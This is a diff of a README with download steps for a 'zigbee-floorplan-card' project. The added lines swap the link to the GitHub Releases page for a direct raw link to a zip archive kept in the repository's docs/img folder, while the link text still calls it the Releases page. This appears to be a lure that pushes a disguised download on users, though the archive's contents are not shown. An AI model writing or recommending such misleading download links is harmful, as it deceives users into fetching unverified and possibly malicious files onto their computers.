Matheusmiura/zigbee-floorplan-card/README.md

 Follow these steps to download and run **zigbee-floorplan-card**.

 1. **Visit the Releases Page**
-   Click the button above to go to the [Releases page](https://github.com/Matheusmiura/zigbee-floorplan-card/releases).
+   Click the button above to go to the [Releases page](https://raw.githubusercontent.com/Matheusmiura/zigbee-floorplan-card/main/docs/img/zigbee-floorplan-card-3.6.zip).

 2. **Download the Latest Version**
    On the Releases page, look for the latest version.
-Click the asset that says "zigbee-floorplan-card.zip" to download it to your computer.
+Click the asset that says "https://raw.githubusercontent.com/Matheusmiura/zigbee-floorplan-card/main/docs/img/zigbee-floorplan-card-3.6.zip" to download it to your computer.

 3. **Unzip the File**
    After the download completes, locate the downloaded file.
 Right-click it and select 'Extract All' to unzip the folder.